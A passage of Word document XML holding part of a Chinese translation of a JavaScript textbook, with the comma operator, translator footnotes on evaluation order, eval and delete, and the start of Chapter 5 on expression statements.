        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，它和下面的代码基本上是等价的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i=0;j=1;k=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>总是会计算左侧的表达式，但计算结果忽略掉，也就是说，只有左侧表达式具有副作用，才会使用</w:t>
      </w:r>
      <w:r>
        <w:t>逗号运算符让代码变得更通顺。逗号运算符最常用的场景是在</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），这个</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环通常具有多个循环变量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中的第一个逗号是</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句的一部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>第二个逗号是逗号运算符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它将两个表达式（</w:t>
      </w:r>
      <w:r>
        <w:t>i++</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>j--</w:t>
      </w:r>
      <w:r>
        <w:t>）放在一条（</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中的）语句中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0,j=10;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>j;i++,j--)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(i+j);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>作者在这里揭示了一种很容易忽略的现象。假设存在</w:t>
      </w:r>
      <w:r>
        <w:t>a=1</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>"b=(a++)+a;"</w:t>
      </w:r>
      <w:r>
        <w:t>将如何计算结果呢？按照正文所述，顺序应该是，</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）计算</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）计算</w:t>
      </w:r>
      <w:r>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:t>（假设值为</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）计算</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>）计算</w:t>
      </w:r>
      <w:r>
        <w:t>c+a</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>）将</w:t>
      </w:r>
      <w:r>
        <w:t>c+a</w:t>
      </w:r>
      <w:r>
        <w:t>的结果赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>。按照</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>的定义，第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）步中</w:t>
      </w:r>
      <w:r>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:t>的结果依然是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，随后</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>立即增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，因此在执行第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）步时，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的值已</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>经是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>。所以</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的结果为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>。很多初学者会误认为</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的操作是在表达式计算完毕后执行的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>求余运算也叫做模运算，模就是余数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中存在一个隐藏的成员，这个成员指向其父类的原型，如果父类的原型是另外一个类的实例的话，则这个原型对象中也存在一个隐藏成员指向另外一个类的原型，这种链条将许多对象或类串接起</w:t>
      </w:r>
      <w:r>
        <w:t>来，既是原型链。原文所讲</w:t>
      </w:r>
      <w:r>
        <w:t>f.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>不在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型链中也就是说</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>没有派生关系，更多细节请参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>这里的原文是</w:t>
      </w:r>
      <w:r>
        <w:t>parse</w:t>
      </w:r>
      <w:r>
        <w:t>，意思是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这段字符串，更精确地讲，应该是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这段字符串，编译不包括代码的执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>原文有误，已修改。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>比如这段代码：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var foo=function(a){ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eval(a); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">foo("return;"); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>按照原文的意思，这段代码中执行</w:t>
      </w:r>
      <w:r>
        <w:t>eval(a)</w:t>
      </w:r>
      <w:r>
        <w:t>的上下文是全局的，在全局上下文中使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>会抛出语法错误</w:t>
      </w:r>
      <w:r>
        <w:t>:return not in function</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>这里是指那些没有语义的代码片段通过</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>执行都会抛出语法错误异常。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>这里的场景其实不包括如果变量已经定义且值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的情况。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>如果你是</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>程序员，请注意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>是完全不同的。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，内存的回收是通过垃圾回收自动回收的，你不用担心内存的显式释放问题，这</w:t>
      </w:r>
      <w:r>
        <w:t>样则完全不用像</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>那样通过</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>来删除整个对象。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="Di_5Zhang__Yu_Ju_"/>
      <w:bookmarkStart w:id="107" w:name="Di_5Zhang__Yu_Ju_____Di_4Zhang_Ti_Dao__B"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章　语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章提到，表达式在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是短语，那么语句（</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>）就是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>整句或命令。正如英文是用句号作结尾来分隔语句，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句是以分号结束（见</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）。表达式计算出一个值，但语句用来执行以使某件事发生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>使某件事发生</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的一个方法是计算带有副作用的表达式。诸如赋值和函数调用这些有副作用的表达式，是可以作为单独的语句的，这种把表达式当做语句的用法也称做表达式语句（</w:t>
      </w:r>
      <w:r>
        <w:t>expression s</w:t>
      </w:r>
      <w:r>
        <w:t>tatement</w:t>
      </w:r>
      <w:r>
        <w:t>）。类似的语句还有声明语句（</w:t>
      </w:r>
      <w:r>
        <w:t>declaration statement</w:t>
      </w:r>
      <w:r>
        <w:t>），声明语句用来声明新变量或定义新函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序无非就是一系列可执行语句的集合。默认情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器依照语句的编写顺序依次执行。另一种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>使某件事发生</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的方法是改变语句的默认执行顺序。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中有很多语句和控制结构（</w:t>
      </w:r>
      <w:r>
        <w:t>control structure</w:t>
      </w:r>
      <w:r>
        <w:t>）来改变语句的默认执行顺序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>条件（</w:t>
      </w:r>
      <w:r>
        <w:t>conditional</w:t>
      </w:r>
      <w:r>
        <w:t>）语句，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器可以根据一个表达式的值来判断是执行还</w:t>
      </w:r>
      <w:r>
        <w:t>是跳过这些语句，如</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>循环（</w:t>
      </w:r>
      <w:r>
        <w:t>loop</w:t>
      </w:r>
      <w:r>
        <w:t>）语句，可以重复执行语句，如</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>跳转（</w:t>
      </w:r>
      <w:r>
        <w:t>jump</w:t>
      </w:r>
      <w:r>
        <w:t>）语句，可以让解释器跳转至程序的其他部分继续执行，如</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来的几节将介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中各式各样的语句及其语法。本章最后的表</w:t>
      </w:r>
      <w:r>
        <w:t>5-1</w:t>
      </w:r>
      <w:r>
        <w:t>对这些语句作了总结。一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序无非是一个以分号分隔的语句集合，所以一旦掌握了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，就可以开始编写</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="5_1_Biao_Da_Shi_Yu_Ju_"/>
      <w:r>
        <w:t>5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　表达式语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>具有副作用的表达</w:t>
      </w:r>
      <w:r>
        <w:t>式是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中最简单的语句（</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍了一种重要的无副作用的表达式语句）。这类语句已经在第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述了。赋值语句是一类比较重要的表达式语句，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>greeting="Hello"+name;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i*=3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>递增运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:t>）和递减运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>）和赋值语句有关。它们的作用是改变一个变量的值，就像执行一条赋值语句一样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>counter++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的重要作用是删除一个对象的属性，所以，它一般作为语句使用，而不是作为复杂表达式的一部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数调用是表达式语句的另一个大类，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(greeting);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然这些客户端函数调用都是表达式，但它们都对</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器造成了一些影响，所以我们认为它们也是语句。调用一个没有任何副作用的函数是没有意义的，除非它是复杂表达式或赋值语句的一部分，例如，不可能计算了一个余弦值随即把它丢弃：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.cos(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
